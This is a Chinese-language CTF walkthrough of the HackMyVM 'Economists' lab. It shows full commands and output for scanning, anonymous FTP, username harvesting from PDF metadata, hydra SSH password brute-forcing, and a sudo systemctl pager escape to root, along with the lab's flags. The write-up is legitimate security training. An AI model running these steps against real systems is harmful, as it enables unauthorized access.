[HackMyVM]靶场Economists

文章描述了一次针对192.168.56.145靶机的网络渗透测试过程,包括使用Nmap进行端口扫描,发现开放的FTP服务并尝试匿名登录,查看PDF文件获取用户名,然后使用gobuster进行目录枚举,最终通过暴力破解SSH获取root权限。
摘要由CSDN通过智能技术生成

难度:Easy

kali:192.168.56.104

靶机:192.168.56.145

端口扫描

┌──(root㉿kali2)-[~]
└─# nmap 192.168.56.145
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-04 18:58 CST
Nmap scan report for 192.168.56.145
Host is up (0.000081s latency).
Not shown: 997 closed tcp ports (reset)
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:E0:55:E3 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.12 seconds

开启端口:21 22 80

试一下ftp匿名登录

┌──(root㉿kali2)-[~/Desktop]
└─# ftp 192.168.56.145
Connected to 192.168.56.145.
220 (vsFTPd 3.0.3)
Name (192.168.56.145:root): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||11414|)
150 Here comes the directory listing.
-rw-rw-r--    1 1000     1000       173864 Sep 13  2023 Brochure-1.pdf
-rw-rw-r--    1 1000     1000       183931 Sep 13  2023 Brochure-2.pdf
-rw-rw-r--    1 1000     1000       465409 Sep 13  2023 Financial-infographics-poster.pdf
-rw-rw-r--    1 1000     1000       269546 Sep 13  2023 Gameboard-poster.pdf
-rw-rw-r--    1 1000     1000       126644 Sep 13  2023 Growth-timeline.pdf
-rw-rw-r--    1 1000     1000      1170323 Sep 13  2023 Population-poster.pdf
226 Directory send OK.

好多pdf文件,get下来看了一下,pdf上面没什么东西,分析一下有什么username

┌──(root㉿kali2)-[~/Desktop]
└─# exiftool *.pdf | grep Author
Author                          : joseph
Author                          : richard
Author                          : crystal
Author                          : catherine
Author                          : catherine

拿到几个用户名,可能有用

先随便扫一下

┌──(root㉿kali2)-[~]
└─# gobuster dir -u http://192.168.56.145 -x html,txt,php,bak,zip --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.145
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              html,txt,php,bak,zip
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 279]
/images               (Status: 301) [Size: 317] [--> http://192.168.56.145/images/]
/index.html           (Status: 200) [Size: 35027]
/about.html           (Status: 200) [Size: 23219]
/contact.html         (Status: 200) [Size: 14317]
/blog.html            (Status: 200) [Size: 15196]
/main.html            (Status: 200) [Size: 931]
/services.html        (Status: 200) [Size: 17709]
/css                  (Status: 301) [Size: 314] [--> http://192.168.56.145/css/]
/js                   (Status: 301) [Size: 313] [--> http://192.168.56.145/js/]
/cases.html           (Status: 200) [Size: 18018]
/readme.txt           (Status: 200) [Size: 410]
/fonts                (Status: 301) [Size: 316] [--> http://192.168.56.145/fonts/]
/.html                (Status: 403) [Size: 279]
Progress: 433406 / 1323366 (32.75%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 433517 / 1323366 (32.76%)
===============================================================
Finished
===============================================================

去web看下

没找到什么利用点

尝试用获取的username爆破一下ssh,用rockyou没爆破出来,可能字典不对,用cewl获取网页单词生成字典

┌──(root㉿kali2)-[~/Desktop]
└─# cewl http://192.168.56.145 > passes.txt

┌──(root㉿kali2)-[~/Desktop]
└─# hydra -L user.txt -P passes.txt ssh://192.168.56.145 -t 64
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-04-04 19:22:07
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 64 tasks per 1 server, overall 64 tasks, 1848 login tries (l:4/p:462), ~29 tries per task
[DATA] attacking ssh://192.168.56.145:22/
[22][ssh] host: 192.168.56.145   login: joseph   password: wealthiest
[STATUS] 494.00 tries/min, 494 tries in 00:01h, 1386 to do in 00:03h, 32 active

拿到一组账号密码 joseph:wealthiest

直接拿到user flag

┌──(root㉿kali2)-[~/Desktop]
└─# ssh joseph@192.168.56.145 
The authenticity of host '192.168.56.145 (192.168.56.145)' can't be established.
ED25519 key fingerprint is SHA256:nKBoUMUnxyKH34KaiDU6gjV4RVOrd181pL9rHCLLD0s.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.145' (ED25519) to the list of known hosts.
joseph@192.168.56.145's password: 
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-162-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu 04 Apr 2024 11:25:01 AM UTC

  System load:  0.26               Processes:               115
  Usage of /:   47.3% of 11.21GB   Users logged in:         0
  Memory usage: 7%                 IPv4 address for enp0s3: 192.168.56.145
  Swap usage:   0%


 * Introducing Expanded Security Maintenance for Applications.
   Receive updates to over 25,000 software packages with your
   Ubuntu Pro subscription. Free for personal use.

     https://ubuntu.com/pro

Expanded Security Maintenance for Applications is not enabled.

51 updates can be applied immediately.
To see these additional updates run: apt list --upgradable

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


joseph@elite-economists:~$ id
uid=1001(joseph) gid=1001(joseph) groups=1001(joseph)
joseph@elite-economists:~$ ls -al
total 32
drwxr-xr-x 4 joseph joseph 4096 Apr  4 11:23 .
drwxr-xr-x 6 root   root   4096 Sep 13  2023 ..
-rw------- 1 joseph joseph    0 Sep 14  2023 .bash_history
-rw-r--r-- 1 joseph joseph  220 Sep 13  2023 .bash_logout
-rw-r--r-- 1 joseph joseph 3771 Sep 13  2023 .bashrc
drwx------ 2 joseph joseph 4096 Apr  4 11:23 .cache
drwxrwxr-x 3 joseph joseph 4096 Sep 13  2023 .local
-rw-r--r-- 1 joseph joseph  807 Sep 13  2023 .profile
-rw-rw-r-- 1 joseph joseph 3271 Sep 14  2023 user.txt
joseph@elite-economists:~$ cat user.txt 


                                                                                                    
                                                                                                    
                      ...................                 ....................                      
                 .............................        .............................                 
             ............              ...........     ......              ............             
           ........                         ........                             ........           
        ........              ...              ........           ....              .......         
       ......                .....         ..     ......          .....                ......       
     .............................        .....     ......        .............................     
    ..............................       .....        .....       ..............................    
                                        .....          .....                                        
                                       .....            .....                                       
                                      .....              .....                                      
                                      .....              .....                                      
                                     .....                ....                                      
 .................................................................................................. 
................................................................................................... 
                                     .....               .....                                      
                                      .....              .....                                      
                                      .....              .....                                      
                                       .....            .....                                       
                                        .....          .....                                        
    ..............................       .....        .....       ..............................    
     .............................        ......     .....        .............................     
       ......                .....         .......     ..         .....                ......       
        ........              ...            .......              ....              .......         
           ........                            .........                         ........           
             ...........               ......     ...........               ...........             
                ..............................       ..............................                 
                     .....................                ....................                      
                                                                                                    
                                                                                                    
Flag: HMV{37q3p33CsMJgJQbrbYZMUFfTu}

sudo -l

joseph@elite-economists:~$ sudo -l
Matching Defaults entries for joseph on elite-economists:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User joseph may run the following commands on elite-economists:
    (ALL) NOPASSWD: /usr/bin/systemctl status

直接执行

sudo /usr/bin/systemctl status

然后再底端命令行输入!bash就拿到了root权限

joseph@elite-economists:~$ sudo /usr/bin/systemctl status
● elite-economists
    State: running
     Jobs: 0 queued
   Failed: 0 units
    Since: Thu 2024-04-04 10:57:17 UTC; 32min ago
   CGroup: /
           ├─user.slice 
           │ └─user-1001.slice 
           │   ├─user@1001.service …
           │   │ └─init.scope 
           │   │   ├─1776 /lib/systemd/systemd --user
           │   │   └─1777 (sd-pam)
           │   └─session-4.scope 
           │     ├─1760 sshd: joseph [priv]
           │     ├─1856 sshd: joseph@pts/0
           │     ├─1857 -bash
           │     ├─1898 sudo /usr/bin/systemctl status
           │     ├─1899 /usr/bin/systemctl status
           │     └─1900 pager
           ├─init.scope 
           │ └─1 /sbin/init maybe-ubiquity
           └─system.slice 
             ├─apache2.service 
             │ ├─759 /usr/sbin/apache2 -k start
             │ ├─764 /usr/sbin/apache2 -k start
             │ └─765 /usr/sbin/apache2 -k start
             ├─systemd-networkd.service 
             │ └─641 /lib/systemd/systemd-networkd
             ├─systemd-udevd.service 
             │ └─393 /lib/systemd/systemd-udevd
             ├─cron.service 
             │ └─659 /usr/sbin/cron -f
             ├─polkit.service 
             │ └─667 /usr/lib/policykit-1/polkitd --no-debug
             ├─networkd-dispatcher.service 
!bash
root@elite-economists:/home/joseph# id
uid=0(root) gid=0(root) groups=0(root)
root@elite-economists:~# cat ro*


                                                                                                    
                                                                                                    
                      ...................                 ....................                      
                 .............................        .............................                 
             ............              ...........     ......              ............             
           ........                         ........                             ........           
        ........              ...              ........           ....              .......         
       ......                .....         ..     ......          .....                ......       
     .............................        .....     ......        .............................     
    ..............................       .....        .....       ..............................    
                                        .....          .....                                        
                                       .....            .....                                       
                                      .....              .....                                      
                                      .....              .....                                      
                                     .....                ....                                      
 .................................................................................................. 
................................................................................................... 
                                     .....               .....                                      
                                      .....              .....                                      
                                      .....              .....                                      
                                       .....            .....                                       
                                        .....          .....                                        
    ..............................       .....        .....       ..............................    
     .............................        ......     .....        .............................     
       ......                .....         .......     ..         .....                ......       
        ........              ...            .......              ....              .......         
           ........                            .........                         ........           
             ...........               ......     ...........               ...........             
                ..............................       ..............................                 
                     .....................                ....................                      
                                                                                                    
                                                                                                    
Flag: HMV{NwER6XWyM8p5VpeFEkkcGYyeJ}

这才是easy难度的

  • 10
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

tao0845

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值